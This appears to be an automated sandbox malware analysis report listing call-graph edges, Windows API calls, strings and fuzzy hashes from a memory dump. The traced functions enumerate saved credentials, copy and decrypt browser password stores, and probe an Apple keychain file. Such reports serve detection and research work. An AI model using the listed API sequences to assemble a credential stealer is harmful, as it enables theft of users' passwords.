39709->39684 39709->39685 39711 40a804 8 API calls 39710->39711 39712 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39711->39712 39712->39709 39713->39692 39714->39698 39715->39701 39716->38754 39717->38778 39719 409cf9 GetVersionExW 39718->39719 39720 409d0a 39718->39720 39719->39720 39720->38784 39720->38789 39721->38790 39722->38793 39723->38795 39724->38860 39726 40bba5 39725->39726 39786 40cc26 39726->39786 39729 40bd4b 39807 40cc0c 39729->39807 39734 40b2cc 27 API calls 39735 40bbef 39734->39735 39814 40ccf0 _wcsicmp 39735->39814 39737 40bbf5 39737->39729 39815 40ccb4 6 API calls 39737->39815 39739 40bc26 39740 40cf04 17 API calls 39739->39740 39741 40bc2e 39740->39741 39742 40bd43 39741->39742 39743 40b2cc 27 API calls 39741->39743 39744 40cc0c 4 API calls 39742->39744 39745 40bc40 39743->39745 39744->39729 39816 40ccf0 _wcsicmp 39745->39816 39747 40bc46 39747->39742 39748 40bc61 memset memset WideCharToMultiByte 39747->39748 39817 40103c strlen 39748->39817 39750 40bcc0 39751 40b273 27 API calls 39750->39751 39752 40bcd0 memcmp 39751->39752 39752->39742 39753 40bce2 39752->39753 39754 404423 37 API calls 39753->39754 39755 40bd10 39754->39755 39755->39742 39756 40bd3a LocalFree 39755->39756 39757 40bd1f memcpy 39755->39757 39756->39742 39757->39756 39758->38875 39760 42533e 16 API calls 39759->39760 39761 42541f 39760->39761 39762 424ff0 13 API calls 39761->39762 39763 425425 39762->39763 39764 42538f 16 API calls 39763->39764 39765 42542d 39764->39765 39765->38912 39767 42533e 16 API calls 39766->39767 39768 4253fb 39767->39768 39769 42538f 16 API calls 39768->39769 39770 42540b 39769->39770 39770->38912 39772 40b65c 39771->39772 39773 40b697 SystemTimeToFileTime 39772->39773 39776 40b681 39772->39776 39877 44d9c0 39773->39877 39775 40b6d6 FileTimeToLocalFileTime 39775->39776 39776->38912 39778 409a74 GetTempFileNameW 39777->39778 39779 409a66 GetWindowsDirectoryW 39777->39779 39778->38874 39779->39778 39780->38912 
39781->38912 39782->38912 39783->38912 39784->38887 39785->38909 39818 4096c3 CreateFileW 39786->39818 39788 40cc34 39789 40cc3d GetFileSize 39788->39789 39797 40bbca 39788->39797 39790 40afcf 2 API calls 39789->39790 39791 40cc64 39790->39791 39819 40a2ef ReadFile 39791->39819 39793 40cc71 39820 40ab4a MultiByteToWideChar 39793->39820 39795 40cc95 FindCloseChangeNotification 39796 40b04b ??3@YAXPAX 39795->39796 39796->39797 39797->39729 39798 40cf04 39797->39798 39799 40b633 ??3@YAXPAX 39798->39799 39800 40cf14 39799->39800 39826 40b1ab ??3@YAXPAX ??3@YAXPAX 39800->39826 39802 40bbdd 39802->39729 39802->39734 39803 40cf1b 39803->39802 39805 40cfef 39803->39805 39827 40cd4b 39803->39827 39806 40cd4b 14 API calls 39805->39806 39806->39802 39808 40b633 ??3@YAXPAX 39807->39808 39809 40cc15 39808->39809 39810 40aa04 ??3@YAXPAX 39809->39810 39811 40cc1d 39810->39811 39876 40b1ab ??3@YAXPAX ??3@YAXPAX 39811->39876 39813 40b7d4 memset CreateFileW 39813->38867 39813->38868 39814->39737 39815->39739 39816->39747 39817->39750 39818->39788 39819->39793 39821 40ab6b 39820->39821 39825 40ab93 39820->39825 39822 40a9ce 4 API calls 39821->39822 39823 40ab74 39822->39823 39824 40ab7c MultiByteToWideChar 39823->39824 39824->39825 39825->39795 39826->39803 39828 40cd7b 39827->39828 39861 40aa29 39828->39861 39830 40cef5 39831 40aa04 ??3@YAXPAX 39830->39831 39832 40cefd 39831->39832 39832->39803 39834 40aa29 6 API calls 39835 40ce1d 39834->39835 39836 40aa29 6 API calls 39835->39836 39837 40ce3e 39836->39837 39838 40ce6a 39837->39838 39869 40abb7 wcslen memmove 39837->39869 39839 40ce9f 39838->39839 39872 40abb7 wcslen memmove 39838->39872 39841 40a8d0 7 API calls 39839->39841 39844 40ceb5 39841->39844 39842 40ce56 39870 40aa71 wcslen 39842->39870 39850 40a8d0 7 API calls 39844->39850 39846 40ce8b 39873 40aa71 wcslen 39846->39873 39847 40ce5e 39871 40abb7 wcslen memmove 39847->39871 39852 40cecb 39850->39852 39851 40ce93 39874 40abb7 wcslen memmove 39851->39874 39875 40d00b malloc 

Control-flow Graph (first block 40dd85-40ddeb; legend: Executed / Not Executed)

APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 594330280-3398334509
• Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
• Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (first block 413d4c-413da0; legend: Executed / Not Executed)

APIs
  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
• memset.MSVCRT ref: 00413D7F
• Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• memset.MSVCRT ref: 00413E07
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                          • API String ID: 912665193-1740548384
                                                                                                                                                                                          • Opcode ID: bad4dea3beb0439734bc0ac1abfc8871ebdfa8b569daaedc40f19ab4abd0eaad
                                                                                                                                                                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                          • Opcode Fuzzy Hash: bad4dea3beb0439734bc0ac1abfc8871ebdfa8b569daaedc40f19ab4abd0eaad
                                                                                                                                                                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                          • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040B60D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                          • String ID: BIN
                                                                                                                                                                                          • API String ID: 1668488027-1015027815
                                                                                                                                                                                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                          • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00407082
                                                                                                                                                                                            • Part of subcall function 004069DF: memcpy.MSVCRT ref: 004069FB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$memcpymemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2420179184-0
                                                                                                                                                                                          • Opcode ID: 918725139429929a89f1f48b88d6c4cc4d3c3d390f69a75811133ef8db7b8cf4
                                                                                                                                                                                          • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 918725139429929a89f1f48b88d6c4cc4d3c3d390f69a75811133ef8db7b8cf4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1690352074-0
                                                                                                                                                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoSystemmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3558857096-0
                                                                                                                                                                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          [Figure: control-flow graph of the function starting at 0044553B; legend: Executed, Not Executed]
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                          • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                          • memset.MSVCRT ref: 00445725
                                                                                                                                                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                            • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                            • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                          • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                          • memset.MSVCRT ref: 00445755
                                                                                                                                                                                          • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                          • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                          • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                          • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                          • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                          • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                          • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                          • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                          • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                          • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                          • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                          • memset.MSVCRT ref: 00445986
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                                                                                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                          • API String ID: 2745753283-3798722523
                                                                                                                                                                                          • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                          • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                          • API String ID: 2744995895-28296030
                                                                                                                                                                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                          • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                          • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                          • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                          • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                          • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                          • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                          • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040BB66
                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                                                                                                                                                          • String ID: chp$v10
                                                                                                                                                                                          • API String ID: 170802307-2783969131
                                                                                                                                                                                          • Opcode ID: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
                                                                                                                                                                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040E407
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040E422
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040E43D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                                                                                                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                          • API String ID: 3073804840-2252543386
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3715365532-3916222277
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                            • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
